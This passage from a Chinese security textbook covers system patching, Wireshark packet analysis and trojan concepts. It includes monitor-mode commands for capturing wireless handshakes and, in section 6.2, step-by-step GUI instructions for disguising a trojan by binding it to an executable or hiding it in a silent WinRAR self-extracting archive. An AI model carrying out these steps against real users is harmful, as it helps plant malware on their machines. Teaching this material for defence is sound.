4.5.1.使用“Windows更新”修补漏洞 
“Windows更新”是系统自带的用于检测系统更新的工具，使用它可以下载并安装系统更新。以 Windows 10系统为例，安装系统更新的具体操作步骤如下。 
微视频

Step01单击“开始”按钮，在打开的菜单中选择“设置”选项，如图 4-68所示。 

Step02打开“设置”窗口，在其中可以看到有关系统设置的相关功能，如图 4-69所示。

　　　　


　图 4-68 “设置”选项图 4-69 “设置”窗口 

Step03单击“更新和安全”图标，打开“更新和安全”窗口，在其中选择 “Windows更新”选项。
如图 4-70所示。 
Step04单击“检查更新”按钮，即可开始检查网上是否有更新文件，如图 4-71所示。


　


　　图 4-70 “更新和安全”窗口图 4-71 查询更新文件 

Step05检查完毕后，如果存在更新文件，则会弹出如图 4-72所示的信息提示，提示用户有可
用更新，并自动开始下载更新文件。 

Step06下载完成后，系统会自动安装更新文件，安装完毕后，会弹出如图 4-73所示的信息提
示框。 

Step07单击“立即重新启动”按钮，立即重新启动计算机。重新启动完毕后，再次打开 “Windows
更新”窗口，在其中可以看到“你的设备已安装最新的更新”信息提示，如图 4-74所示。 

Step08单击“高级选项”超链接，打开“高级选项”设置工作界面，在其中可以选择安装更新
的方式，如图 4-75所示。
67


　


　　　　图 4-72 下载更新文件　　图 4-73 自动安装更新文件


　


　　　图 4-74 完成系统更新图 4-75 选择更新方式 

4.5.2.使用电脑管家修补漏洞
除使用 Windows系统自带的“ Windows更新”下载并及时为系统修复漏洞外，还可以使用第
微视频三方软件及时为系统下载并安装漏洞补丁。常用的软件有《360安全卫士》《电脑管家》等。使用电脑管家修复系统漏洞的具体操作步骤如下。 

Step01双击桌面上的电脑管家图标，打开“电脑管家”窗口，如图 4-76所示。

图 4-76 “电脑管家”窗口

Step02选择“工具箱”选项，进入如图 4-77所示的“工具箱”窗口。

图 4-77 “工具箱”窗口 

Step03单击“修复漏洞”图标，电脑管家开始自动扫描系统中存在的漏洞，并在下面的界面中
显示出来，用户在其中可以自主选择需要修复的漏洞，如图 4-78所示。

图 4-78 “系统修复”窗口 

Step04单击“一键修复”按钮，开始修复系统存在的漏洞，如图 4-79所示。

图 4-79 修复系统漏洞

Step05修复完成后，则系统漏洞的状态变为“修复成功”，如图 4-80所示。

图 4-80 成功修复系统漏洞 

4.6.实战演练 
微视频4.6.1.实战1：修补蓝牙协议中的漏洞
蓝牙协议中的 BlueBorne漏洞可以使 53亿带蓝牙设备受影响，这个影响包括安卓、 iOS、 
Windows、Linux在内的所有带蓝牙功能的设备，攻击者甚至不需要进行设备配对，就能发动攻击，
完全控制受害者设备。
攻击者一旦触发该漏洞，计算机会在用户没有任何感知的情况下，访问攻击者构造的钓鱼网站。
不过，微软已经发布了 BlueBorne漏洞的安全更新，广大用户使用电脑管家及时打补丁，或手动关
闭蓝牙适配器，可有效规避 BlueBorne攻击。
关闭计算机中蓝牙设备的操作步骤如下。 


Step01右击“开始”按钮，在弹出的快捷菜单中选择“设置”命令，如图 4-81所示。 

Step02弹出“设置”窗口，在其中显示 Windows设置的相关项目，如图 4-82所示。

　　　　


图 4-81 “设置”命令图 4-82 “设置”窗口 

Step03单击“设备”图标，进入“蓝牙和其他设备”工作界面，在其中显示了当前计算机的蓝
牙设备处于开启状态，如图 4-83所示。

Step04单击“蓝牙”下方的“开”按钮，即可关闭计算机的蓝牙设备，如图 4-84所示。

　


图 4-83 “蓝牙和其他设备”工作界面图 4-84 关闭蓝牙设备 
4.6.2.实战2：一个命令就能修复系统 
SFC命令是 Windows操作系统中使用频率比较高的命令，主要作用是扫描所有受保护的系统文件并完成修复工作。该命令的语法格式如下： 

各个参数的含义如下。 

● /SCANNOW：立即扫描所有受保护的系统文件。 

● /SCANONCE：下次启动时扫描所有受保护的系统文件。 

● /SCANBOOT：每次启动时扫描所有受保护的系统文件。 

● /REVERT：将扫描返回到默认设置。 

● /PURGECACHE：清除文件缓存。 


● /CACHESIZE=x：设置文件缓存大小。下面以最常用的 sfc/scannow为例进行讲解，具体操作步骤如下。 



Step01右击“开始”按钮，在弹出的快捷菜单中选择“命令提示符（管理员）”命令，如图 
4-85所示。 
Step02弹出“管理员：命令提示符”窗口，输入命令 sfc/scannow，按 Enter键确认，如图 4-86所示。



　　　　
　图 4-85 “命令提示符（管理员）”命令图 4-86 输入命令 

Step03开始自动扫描系统，并显示扫描的进度，如图 4-87所示。

Step04在扫描的过程中，如果发现损坏的系统文件，会自动进行修复操作，并显示修复后的信息，
如图 4-88所示。

　　　


　　　图 4-87 自动扫描系统图 4-88 自动修复系统
第章
5



数据捕获与安全分析 
Wireshark是一个网络封包分析软件，主要功能是捕获网络封包，并尽可能显示出详细的网络封包信息。网络管理员使用 Wireshark可以检测当前网络问题。本章介绍 Wireshark的详细应用，主要内容包括 Wireshark的快速配置、捕获设置以及对捕获内容的分析等。 
5.1.认识 Wireshark 
Wireshark不是入侵检测工具，对于网络上的异常流量行为，不会产生警示或任何提示，用户只有仔细分析 Wireshark捕获的封包，才能了解当前网络的运行情况。 
5.1.1.功能介绍 
Wireshark是目前使用比较广泛的网络抓包软件，主要是因为其开源、免费，通过修改源码还

可以添加个性的功能。使用的人群主要有网络管理员、网络工程师、安全工程师、 IT运维工程师以微视频及网络技术爱好者。
在实际应用中，使用 Wireshark可以进行网络底层分析、解决网络故障问题、发现潜在网络安全问题等。
（1）网络底层分析

通过 Wireshark可以捕获底层网络通信，对于初学者而言可以更加直观地了解网络通信中每一层数据处理的过程。如果想要成一个网络工程师，了解和熟悉网络中每一层通信过程是非常有必要的。
（2）解决网络故障问题

由于网络的特殊性，所以引起网络故障的方式也是多样的，通过 Wireshark可以很好地检查网络通信的各个环节，精确定位到具体发生故障的节点以及可能发生故障的区域。
（3）发现潜在网络安全问题

通过 Wireshark对网络数据包分析，可以发现网络中潜在的安全问题，如 ARP欺骗、 DDOS网络攻击等。 

5.1.2.基本界面
打开 Wireshark抓包工具，单击“应用程序”下拉菜单，从中选择“ 09-嗅探 /欺骗”菜单项，
在弹出的菜单中可以看到 wireshark图标，如图 5-1所示。微视频

图 5-1 “应用程序”下拉菜单
单击 wireshark图标便可以打开 Wireshark抓包软件，其工作界面如图 5-2所示。

图 5-2 Wireshark工作界面
如果已经进行了抓包操作，当打开一个数据包后，其工作界面如图 5-3所示。

图 5-3 抓取数据包
5.2.开始抓包
通过前面的学习，相信读者对 Wireshark有了一个基本的了解，下面针对如何抓取数据以及如何过滤数据进行讲解。 
5.2.1.快速配置 
Wireshark的特点是简单易用，通过简单的设置便可以开始抓包，在选择一个网卡后，单击“开

始”按钮，便可以实现快速抓包。 微视频
1.开始抓包
具体的操作步骤如下。 


Step01打开 Wireshark抓包工具，在界面“捕获”功能选项中，可以对捕获数据包进行快速配置，
如果网卡中产生数据，会在网卡的右侧显示折线图，如图 5-4所示。 

Step02双击选中的网卡，便可以开始抓包，此时“开始”按钮变成灰色，“停止”按钮与“重置”
按钮可选。图 5-5所示为 Wireshark工具抓取的数据信息。

　


图 5-4 折线图信息　　　　图 5-5 抓取数据信息
提示：抓包一旦开始，默认数据包显示列表会动态刷新最新捕获的数据。单击“停止”按钮可以停止对数据包的捕获，此时状态栏会显示当前捕获的数据包数量及大小。 
2.数据包显示列

默认情况下，Wireshark会给出一个初始数据包显示列，如图 5-6所示。

图 5-6 初始数据包显示列
主要内容介绍如下。

（1）No.：编号，根据抓取的数据包自动分配。

（2）Time：时间，根据捕获时间设定该列。



（3）Source：源地址信息，如果数据包包含源地址信息（如： IP、MAC等），这类信息会显示在该列。
（4）Destination：目的地址信息，同源地址类似。

（5）Protocol：协议信息，捕获的数据包会根据不同的协议进行标注，该列显示具体协议类型。

（6）Length：长度信息，标注出该数据包的长度信息。

（7）Inof：信息，是 Wireshark对数据包的一个解读。 




75
3.修改显示列

默认的显示列可以修改，在实际数据分析中，根据需要可以修改显示列的项目，具体操作步骤如下。 

Step01选中需要加入显示列的子项，单击鼠标

右键，在弹出的快捷菜单中选择“应用位列”命令，
如图 5-7所示。 

图 5-7 “应用位列”菜单命令


Step02此时显示列中会加入新列。这样针对特殊协议分析会非常有帮助，如图 5-8所示。 

Step03用户还可以删除、隐藏当前列。在显示列标题中单击鼠标右键，在弹出的快捷菜单中可
以通过选择相应的命令来删除或隐藏列，如图 5-9所示。

　


　图 5-8 加入新列图 5-9 删除或隐藏列菜单 

Step04用户可以对当前列信息进行修改。在显示列标题中单击鼠标右键，在弹出的快捷菜单中
选择“编辑列”命令，即可进入列信息编辑模式，这时可以对当前列信息进行修改，如图 5-10所示。

图 5-10 列信息编辑模式 
4.修改显示时间

默认情况下，Wireshark给出的时间信息不方便阅读，为此， Wireshark提供了多种时间显示方式，用户可以根据个人喜好进行选择，具体的操作步骤如下。 

Step01单击“视图”菜单，在弹出的菜单中选择“时间显示格式”命令，如图 5-11所示。 

Step02这样就可以将默认时间信息以时间格式显示出来，修改后的时间如图 5-12所示，这样
更加符合阅读习惯。

　　　　


　　　　　图 5-11 “视图”菜单图 5-12 时间显示格式
5.名字解析

默认情况下， Wireshark只开启了 MAC地址解析，针对不同厂商的 MAC头部信息进行解析，这样方便阅读。如果在实际应用中有需要，可以开启网络名称解析、传输层名称解析。具体的操作步骤如下。 

Step01单击“捕获”菜单，在弹出的菜单中选择“选项”命令，如图 5-13所示。 

Step02在打开的设置界面中选择“选项”选项卡，如图 5-14所示，从中勾选相应的选项解析
名称即可。

　　　　


图 5-13 “选项”命令图 5-14 “选项”选项卡 

Step03用户还可以手动修改对地址的解析。选中需要解析的地址段，单击鼠标右键，在弹出的
快捷菜单中选择“编辑解析的名称”命令，如图 5-15所示。 

Step04 Wireshark会给出地址解析库存放的位置，然后单击“统计”菜单，在弹出的菜单中
选择“已解析的地址”命令，如图 5-16所示。



　　　　
图 5-15 “编辑解析的名称”命令图 5-16 “已解析的地址”命令 

Step05打开如图 5-17所示的对话框，里面存放了已经解析的地址信息。通过对名称的解析，
对于数据包的来源去处会更加清晰明了，所以名称解析是一个非常好的功能。

图 5-17 解析地址信息
注意：开启名称解析可能会对性能带来损耗，同时地址解析不能保证全部正确。如果数据流比较大，建议不开启名称解析，在对抓取的数据包处理时再开启。

5.2.2.数据包操作
数据包操作是 Wireshark的主要功能，获取数据包后，用户可以对数据包进行标记、注释、合
微视频	并以及导出等操作。 
1.标记数据包

标记数据包可以实现对比较重要的数据包进行标记，同时还可以修改数据包显示的颜色。标记数据包的操作步骤如下。 
Step01在需要进行标记的数据包上，单击鼠标右键，在弹出的快捷菜单中选择“标记 /取消标记分组”命令，如图 5-18所示。 

Step02标记后的数据包会高亮显示，同其他数据包有明显区别，如图 5-19所示。

　	　


图 5-18 	“标记 /取消标记图 5-19 标记后的数据包信息分组”命令 
2.修改颜色

为了区分不同的数据包，Wireshark提供了对数据包进行区分颜色的设置，具体的操作步骤如下。 

Step01在数据包上单击鼠标右键，在弹出的快捷菜单中选择“对话着色”命令，如图 5-20所示，
即可完成对数据包着色的操作。这个操作只针对此次抓包有效。 

Step02如果想要给数据包添加永久性的着色效果，用户可以单击“视图”菜单，在弹出的菜单
中选择“着色规则”命令，如图 5-21所示。

　　　　　　


图 5-20 “对话着色”命令	图 5-21 “着色规则”命令 

Step03打开如图 5-22所示的对话框，在其中修改数据包的颜色，其修改的颜色将会永久保存。

图 5-22 着色显示数据信息
提示：默认情况下，Wireshark提供的颜色规则可以满足用户的需求，如果不是特殊需要不建议永久修改数据包的颜色。
3.修改列表项颜色
修改列表项颜色的操作步骤如下。 


Step01双击需要修改的列表项，下方会出现“前景”和“背景”两个按钮，如图 5-23所示。 

Step02单击“前景”或“背景”按钮，会弹出“选择颜色”对话框， Wireshark提供了丰富的颜色，
当然如果有需要还可以自定义颜色，如图 5-24所示。

　


　　图 5-23 选择需要修改的列表项图 5-24 “选择颜色”对话框 
4.添加注释 

Wireshark提供对数据包注释的功能，在实际操作中如果感觉某个数据包有问题或者比较重要，可以添加一段注释信息，具体操作步骤如下。 

Step01选中需要添加注释信息的数据包，单击鼠标右键，在弹出的快捷菜单中选择“分组注释”
命令，如图 5-25所示。 

Step02这时会弹出如图 5-26所示的“注释内容”对话框，在其中输入相应的注释，添加注释
信息后下方的解读列表也会出现这段注释信息，以方便用户查看。


　　　　　　　　


　图 5-25 “分组注释”命令图 5-26 “注释内容”对话框 
5.合并数据包

在实际抓包过程中，如果网络流量比较大，不停止抓包操作，可能会出现抓包工具消耗掉所有内存，最终导致系统崩溃的状态。为解决这个问题，用户可以采取分段抓取，生成多个数据包文件，最后为了整体分析，再将这些分段数据包合并成一个包。
合并数据包的操作步骤如下。 


Step01选择“文件”菜单，在弹出的菜单中选择“合并”命令，如图 5-27所示。 

Step02打开“合并捕获文件”对话框，在其中选择需要合并的文件，即可完成合并数据包的操作，
如图 5-28所示。 
6.导出数据包 

Wireshark提供了数据包导出功能，用户可以进行筛选导出，可以通过分类导出，还可以只导出选中数据包。导出数据包的操作步骤如下。

　　


图 5-27 “合并”命令图 5-28 “合并捕获文件”对话框 

Step01选择“文件”菜单，在弹出的菜单中选择“导出特定分组”命令，如图 5-29所示。 

Step02弹出“导出特定分组”对话框，在其中可以选择导出的名字，并设置导出范围是所有分
组还是仅选中分组，如图 5-30所示。 

Step03如果选择“导出分组解析结果”命令，可以将数据包导出不同的格式，如图 5-31所示，
如可以使用 Excel查看的 CSV格式、使用记事本查看的纯文本格式，还可以将数据包导出为 C语言数组、XML数据、JSON数据等格式。




　　　　
　图 5-29 “导出特定分组”命令图 5-30 “导出特定分组”对话框图 5-31 文件格式 

5.2.3.首选项设置
大多数软件都会提供一个首选项设置。该设置主要用于配制软件的整体风格， Wireshark也提
微视频供了首选项设置。进行首选项设置的操作步骤如下。 

Step01选择“编辑”菜单，在弹出的菜单中选择“首选项”命令，如图 5-32所示。 

Step02打开“首选项”对话框，首次打开“首选项”对话框后，在默认打开的界面中，用户可
以进行相关选项的设置，如图 5-33所示。 

Step03在“首选项”对话框中，选择 Columns选项，然后单击左下方的“ +”按钮添加一个列，
单击“-”按钮删除一个列，如图 5-34所示。


　　


　图 5-32 “首选项”命令图 5-33 “首选项”对话框 

Step04选择 Font and Colors选项，在打开的界面中设置字体大小与颜色，如图 5-35所示。

　


图 5-34 增加或删除列　　　　　图 5-35 设置字体大小与颜色 

Step05选择 Layout选项，在打开的界面中设置软件显示布局。默认选择的是分 3行显示，根据个人喜好可以选择不同的布局方式进行显示，如图 5-36所示。

图 5-36 设置布局方式

5.2.4.捕获选项
捕获选项主要针对抓取数据包使用的网卡、抓包前的过滤、抓包大小、抓包时长等进行设置，
微视频这个功能在抓包软件中也属于非常重要的一个设置。进行捕获选项设置的操作步骤如下。 

Step01选择“捕获”菜单，在弹出的菜单中选择“选项”命令，如图 5-37所示。 

Step02打开“捕获接口”对话框，默认选中“输入”选项卡，其中混杂模式为选中状态（该项
需要选中，否则可能抓取不到数据包），列表中列出网卡相关信息，选择相应的网卡可以抓取数据包，如图 5-38所示。

　　


图 5-37 “选项”命令图 5-38 “捕获接口”对话框 

Step03在“捕获接口”对话框中，选择“输出”选项卡，在其中设置文件保存的路径、输出格式、
是否自动创建新文件等，如图 5-39所示。 

Step04在“捕获接口”对话框中，选择“选项”选项卡，在其中设置显示选项、解析名称、自
动停止捕获等参数，如图 5-40所示。


　


　　　图 5-39 “输出”选项卡图 5-40 “选项”选项卡
提示：这里的自动停止捕获规则，相当于一个定时器的作用，当符合条件后停止抓包，可以同多文件保存功能配合使用。例如：设置每 1MB保存一个数据包，符合 10个文件后停止抓包。
5.3.高级操作
高级操作是将捕获的数据包以更直观的形式展现出来，读者学会如何使用这些高级技能，对于以后的数据包处理会更加得心应手。 
5.3.1.分析数据包
分析数据包主要包括数据追踪与专家信息两方面内容，它们都属于“分析”菜单下的功能。 

1.数据追踪微视频
正常通信中如 TCP、UDP、SSL等数据包都是以分片的形式发送的，如果在整个数据包中分片查看数据包不便于分析，使用数据流追踪可以将 TCP、UDP、SSL等数据流进行重组以一个完整的形式呈现出来。打开流追踪有两种方式。
第 1种方式：在数据流显示列表中，选择需要追踪的数据流，单击鼠标右键，在弹出的快捷菜单中选择“追踪流”命令，如图 5-41所示。
第 2种方式：选择“分析”菜单，在弹出的菜单中选择“追踪流”命令，如图 5-42所示。

　　


　　　图 5-41 第 1种方式图 5-42 第 2种方式
以上两种方式都可以打开“追踪流”界面，如图 5-43所示，从这里可以清晰地看到这个协议通信的完整过程。

图 5-43 “追踪流”界面
83
2.专家信息

专家信息可以对数据包中特定状态进行警告说明，其中包括错误信息（ errors）、警告信息（warnings）、注意信息（ notes）以及对话信息（chats）。查看专家信息的操作步骤如下。 

Step01选择“分析”菜单，在弹出的菜单中选择“专家信息”命令，如图 5-44所示。 

Step02打开“专家信息”对话框，如图 5-45所示，其中错误信息会以红色进行标注，警告信
息以黄色进行标注，注意信息以浅蓝色进行标注，正常通信以深蓝色进行标注，每一种类型会单独列出一行进行显示，通过专家信息可以更直观地查看数据通信中存在哪些问题。

　



　　图 5-44 “专家信息”命令图 5-45 “专家信息”对话框 
5.3.2.统计数据包
通过对数据包的统计分析，可以查看更为详细的数据信息，进而分析网络中是否存在安全问题。
微视频查看数据包统计信息的操作步骤如下。 

Step01选择“统计”菜单，在弹出的菜单中选择“捕获文件属性”命令，打开“捕获文件属性”
对话框，在其中可以查看文件、事件、捕获、接口等信息，如图 5-46所示。

图 5-46 “捕获文件属性”对话框 

Step02选择“统计”菜单，在弹出的菜单中选择“协议分级”命令，打开“协议分级统计”对
话框，如图 5-47所示，从这里可以统计出每一种协议在整个数据包中的占有率。

图 5-47 “协议分级统计”对话框 

Step03选择“统计”菜单，在弹出的菜单中选择“对话”命令，打开如图 5-48所示的对话框，
其中包括以太网、IPv4、IPv6、TCP、UDP等不同协议会话信息展示。

图 5-48 协议会话信息 

Step04选择“统计”菜单，在弹出的菜单中选择“端点”命令，打开如图 5-49所示的端点对话框，
其中包含以太网和各种协议信息。

图 5-49 以太网和各种协议信息 

Step05选择“统计”菜单，在弹出的菜单中选择“分组长度”命令，打开如图 5-50所示的分
组长度对话框，这里可以对不同大小数据包进行统计。 

Step06选择“统计”菜单，在弹出的菜单中选择“ I/O图表”命令，打开如图 5-51所示的 I/O图表信息，其中包括一个坐标轴显示的图表，下方可以添加任何协议，也可以选择协议显示的颜色，还可以调整坐标轴的刻度。

图 5-50 数据包统计信息

图 5-51 I/O图表信息 

Step07选择“统计”菜单，在弹出的菜单中选择“流量图”命令，打开如图 5-52所示的流量
图信息，其中包括通信时间、通信地址、端口以及通信过程中的协议功能。

图 5-52 流量图信息

Step08选择“统计”菜单，在弹出的菜单中选择“流量图”命令，打开如图 5-53所示的 TCP
流图信息，在其中可以根据实际需要设置相应的显示，还可以切换数据包的方向。

图 5-53 TCP流图信息 
5.4.实战演练 
5.4.1.实战1：筛选出无线网络中的握手信息
筛选无线网络中的握手信息可以通过以下几个步骤。 

Step01使用 iw dev wlan0 interface add wlan0mon type monitor命令将网卡置入 monitor模式，如图 5-54所示。 

Step02使用 ifcon.g wlan0mon up命令，将新创建的无线网卡启动，如图 5-55所示。


　


　图 5-54 网卡置入 monitor模式图 5-55 启动无线网卡 

Step03启动 Wireshark抓包工具，选择 wlan0mon无线网卡，如图 5-56所示。

图 5-56 选择 wlan0mon无线网卡

Step04在抓取到的数据包中筛选并标记出握手信息数据包，如图 5-57所示。

图 5-57 标记出握手信息数据包 

Step05选择“文件”菜单，在弹出的菜单表中选择“导出特定分组”命令，导出标记后的握手
信息数据包，如图 5-58所示。

图 5-58 导出标记后的握手信息数据包 
5.4.2.实战2：快速定位身份验证信息数据包
通过 Wireshark抓取到整个握手过程数据包后，如何精确定位到身份验证数据包呢？用户可以通过以下步骤来快速定位。 

Step01通过 Wireshark打开抓取到的握手信息数据包，如图 5-59所示。 



Step02在筛选条件文本框中输入 eapol筛选条件，如图 5-60所示。图 5-59 握手信息数据包

图 5-60 输入 eapol筛选条件


按钮，即可展开身份验证信息，如图 5-61所示。

图 5-61 展开身份验证信息
第章
6




木马的入侵与查杀
随着信息化社会的发展，计算机木马的威胁日益严重，查杀的任务也更加艰巨。本章介绍 Web安全当中的木马入侵，主要内容包括什么是木马、木马常用的伪装手段以及如何检测与查杀木马等内容。 
6.1.什么是木马
木马又被称为特洛伊木马，是一种基于远程控制的黑客工具。在黑客进行的各种攻击行为中，木马都起到了开路先锋的作用。 
6.1.1.木马的工作原理
一个完整的木马套装程序包含两个部分，一个是服务端，另一个是客户端。植入对方计算机的是服务端，而黑客正是利用客户端进入运行了服务端的计算机。当运行了含有木马程序的服务端以后，会产生一个容易迷惑用户的进程，并暗中打开端口，向指定地点发送数据。
一台计算机一旦中了木马，就变成了一台傀儡机，对方可以在目标计算机中上传下载文件、偷窥私人文件、偷取各种密码及口令信息等，可以说，该计算机的一切秘密都将暴露在黑客面前，隐私将不复存在！ 
6.1.2.常见的木马类型
随着网络技术的发展，现在的木马可谓形形色色，种类繁多，并且还在不断增加，因此，要想一次性列举出所有的木马种类，是不现实的。但是，从木马的主要攻击能力来划分，常见的木马主要有以下几种类型。 
1.网络游戏木马

由于网络游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊，因此，以盗取网络游戏账号密码为目的的木马也随之发展泛滥起来。网络游戏木马通常采用记录用户键盘输入、游戏进程、 API函数等方法获取用户的密码和账号，窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马制作者。 
2.网银木马

网银木马是针对网上交易系统编写的木马，其目的是盗取用户的卡号、密码等信息。此类木马的危险非常直接，受害用户的损失也更加惨重。
网银木马通常针对性较强，木马作者可能首先对某银行的网上交易系统进行仔细分析，然后针对安全薄弱环节编写病毒程序。如“网银大盗”木马，在用户进入网银登录页面时，会自动把页面换成安全性能较差但依然能够运转的老版页面，然后记录用户在此页面上填写的卡号和密码。随着网上交易的普及，受到外来网银木马威胁的用户也在不断增加。 
3.即时通信软件木马

常见的即时通信类木马一般有发送消息型与盗号型。
（1）发送消息型：通过即时通信软件自动发送含有恶意网址的消息，目的在于让收到消息的用户单击网址激活木马，用户中木马后又会向更多好友发送木马消息。此类木马常用技术是搜索聊天窗口，进而控制该窗口自动发送文本内容。

（2）盗号型：主要目标在于即时通信软件的登录账号和密码，工作原理和网络游戏木马类似，木马作者盗得他人账号后，可以偷窥聊天记录等隐私内容。 


4.破坏性木马

顾名思义，破坏性木马唯一的功能就是破坏感染木马的计算机文件系统，使其遭受系统崩溃或者重要数据丢失的巨大损失。 
5.代理木马

代理木马最重要的任务是给被控制的“肉鸡”种上代理木马，让其变成攻击者发动攻击的跳板。通过这类木马，攻击者可在匿名情况下使用 Telnet、ICO、IRC等程序，从而在入侵的同时隐蔽自己的踪迹，谨防别人发现自己的身份。 
6. FTP木马 

FTP木马的唯一功能就是打开 21端口并等待用户连接，新 FTP木马还加上了密码功能，这样只有攻击者本人才知道正确的密码，从而进入对方的计算机。 
7.反弹端口型木马

反弹端口型木马的服务端（被控制端）使用主动端口，客户端（控制端）使用被动端口，正好与一般木马相反。木马定时监测控制端的存在，发现控制端上线立即弹出，主动连接控制端打开的主动端口。 
6.1.3.木马常用的入侵方法
木马程序千变万化，但大多数木马程序并没有特别的功能，入侵方法大致相同。常见的入侵方法有以下几种。 
1.在 Win.ini文件中加载 

Win.ini文件位于 C:\Windows目录下，在文件的 [windows]段中有启动命令 run=和 load=，一般此两项为空，如果等号后面存在程序名，则可能就是木马程序，应特别当心。这时可根据其提供的源文件路径和功能做进一步检查。
这两项分别是用来当系统启动时自动运行和加载程序的，如果木马程序加载到这两个子项中，系统启动后即可自动运行或加载木马程序。这两项是木马经常攻击的方向，一旦攻击成功，则还会在现有加载的程序文件名之后再加一个它自己的文件名或者参数，这个文件名也往往是常见的文件，如 command.exe、sys.com等来伪装。 
2.在 System.ini文件中加载 

System.ini位于 C:\Windows目录下，其 [boot]字段的 shell=Explorer.exe是木马喜欢的隐藏加载地方。如果 shell=Explorer.exe .le.exe，则 .le.exe就是木马服务端程序。
另外，在 System.ini中的 [386Enh]字段中，要注意检查字段内的 driver＝路径 \程序名也有可能被木马所利用。System.ini中的 mic、drivers、drivers32这 3个字段，也是起加载驱动程序的作用，但也是增添木马程序的好场所。 
3.隐藏在启动组中

有时木马并不在乎自己的行踪，而在意是否可以自动加载到系统中。启动组无疑是自动加载运行木马的好场所，其对应文件夹为 C:\Windows\startmenu\programs\startup。在注册表中的位置是： HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\shell Folders Startup= "c:\Windows\start menu\programs\startup"，所以要检查启动组。 
4.加载到注册表中

由于注册表比较复杂，所以很多木马都喜欢隐藏在这里。木马一般会利用注册表中的几个子项来加载，如下所示： 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServersOnce 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunOnce 
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Run 
HKEY_ CURRENT_USER\Software\Microsoft\Windows\Current Version\RunOnce 
HKEY_ CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServers 
5.修改文件关联

修改文件关联也是木马常用的入侵手段，当用户一旦打开已修改了文件关联的文件后，木马也随之被启动，如：冰河木马就是利用文本文件（ .txt）这个最常见但又最不引人注目的文件格式关联来加载自己，当中了该木马的用户打开文本文件时就自动加载了冰河木马。 
6.设置在超链接中

这种入侵方法主要是在网页中放置恶意代码来引诱用户点击，一旦用户单击超链接，就会感染木马，因此，不要随便点击网页中的链接。 
6.2.木马常用的伪装手段
由于木马的危害性比较大，所以很多用户对木马也有了初步的了解，这在一定程度上阻碍了木马的传播。这是运用木马进行攻击的黑客所不愿意看到的。因此，黑客们往往会使用多种方法来伪装木马，迷惑用户，从而达到欺骗用户的目的。木马常用的伪装手段很多，如伪装成可执行文件、网页、图片、电子书等。 

6.2.1.伪装成可执行文件
利用 EXE捆绑机可以将木马与正常的可执行文件捆绑在一起，从而使木马伪装成可执行文件，
微视频
运行捆绑后的文件等于同时运行了两个文件。将木马伪装成可执行文件的操作步骤如下。 

Step01下载并解压缩 EXE捆绑机，双击其中的可执行文件，打开 “EXE捆绑机”主界面，如图 6-1
所示。 

Step02单击“点击这里指定第一个可执行文件”按钮，打开“请指定第一个可执行文件”对话框，
在其中选择第一个可执行文件，如图 6-2所示。

　　


图 6-1 “EXE捆绑机”主界面图 6-2 选择第一个可执行文件 

Step03单击“打开”按钮，返回“指定第一个可执行文件”对话框，如图 6-3所示。 

Step04单击“下一步”按钮，打开“指定第二个可执行文件”对话框，如图 6-4所示。


　　


图 6-3 “指定第一个可执行文件”对话框图 6-4 选择第二个可执行文件 

Step05单击“点击这里指定第二个可执行文件”按钮，打开“请指定第二个可执行文件”对话框，
在其中选择已经制作好的木马文件，如图 6-5所示。 

Step06单击“打开”按钮，返回“指定第二个可执行文件”对话框，如图 6-6所示。



　　
图 6-5 选择制作好的木马文件图 6-6 “指定第二个可执行文件”对话框

Step07单击“下一步”按钮，打开“指定保存路径”对话框，如图 6-7所示。 

Step08单击“点击这里指定保存路径”按钮，打开“另存为”对话框，在“文件名”文本框中
输入可执行文件的名称，并设置文件的保存类型，如图 6-8所示。


　


图 6-7 “指定保存路径”对话框　　图 6-8 “另存为”对话框 

Step09单击“保存”按钮，即可指定捆绑后文件的保存路径，如图 6-9所示。 

Step10单击“下一步”按钮，打开“选择版本”对话框，在“版本类型”下拉列表中选择“普
通版”选项，如图 6-10所示。


　


图 6-9 指定文件的保存路径图 6-10 “选择版本”对话框 

Step11单击“下一步”按钮，打开“捆绑文件”对话框，提示用户开始捆绑第一个可执行文件
与第二个可执行文件，如图 6-11所示。 

Step12单击“点击这里开始捆绑文件”按钮，即可开始进行文件的捆绑。待捆绑结束之后，即
可看到“捆绑文件成功”提示框，如图 6-12所示。单击“确定”按钮，即可结束文件的捆绑。
提示：黑客可以使用木马捆绑技术将一个正常的可执行文件和木马捆绑在一起。一旦用户运行这个包含有木马的可执行文件，就可以通过木马控制或攻击用户的计算机。


　


　　图 6-11 “捆绑文件”对话框　　　图 6-12 “捆绑文件成功”提示框 
6.2.2.伪装成自解压文件
利用 WinRAR的压缩功能可以将正常的文件与木马捆绑在一起，并生成自解压文件，一旦用

户运行该文件，同时也会激活木马文件，这也是木马常用的伪装手段之一。具体的操作步骤如下。 微视频

Step01准备好要捆绑的文件，这里选择蜘蛛纸牌和木马文件（木马 .exe），并存放在同一个文
件夹下，如图 6-13所示。 

Step02选中蜘蛛纸牌和木马文件（木马 .exe）所在的文件夹并单击鼠标右键，在弹出的快捷菜
单中选择“添加到压缩文件”命令，如图 6-14所示。


　


图 6-13 准备要捆绑的文件图 6-14 “添加到压缩文件”菜单命令 

Step03随即打开“压缩文件名字和参数”对话框，默认显示“常规”选项卡。在“压缩文件名”
文本框中输入要生成的压缩文件的名称，并勾选“创建自解压格式压缩文件”复选框，如图 6-15所示。 

Step04选择“高级”选项卡，在其中勾选“保存文件安全数据”“保存文件流数据”“后台压缩”
“完成操作后关闭计算机电源”，“如果其他 WinRAR副本被激活则等待”复选框，如图 6-16所示。 

Step05单击“自解压选项”按钮，即可打开“高级自解压选项”对话框，在“解压路径”文本
框中输入解压路径，并选中“在当前文件夹中创建”单选按钮，如图 6-17所示。 

Step06选择“模式”选项卡，在其中选中“全部隐藏”单选按钮，这样可以增加木马程序的隐
蔽性，如图 6-18所示。
95


　　　　


　　图 6-15 “常规”选项卡图 6-16 “高级”选项卡


　　　　　　　　


　　　图 6-17 “高级自解压选项”对话框图 6-18 “模式”选项卡 

Step07为了更好地迷惑用户，还可以在“文本和图标”选项卡下设置自解压窗口标题、自解压
文件图标等，如图 6-19所示。 

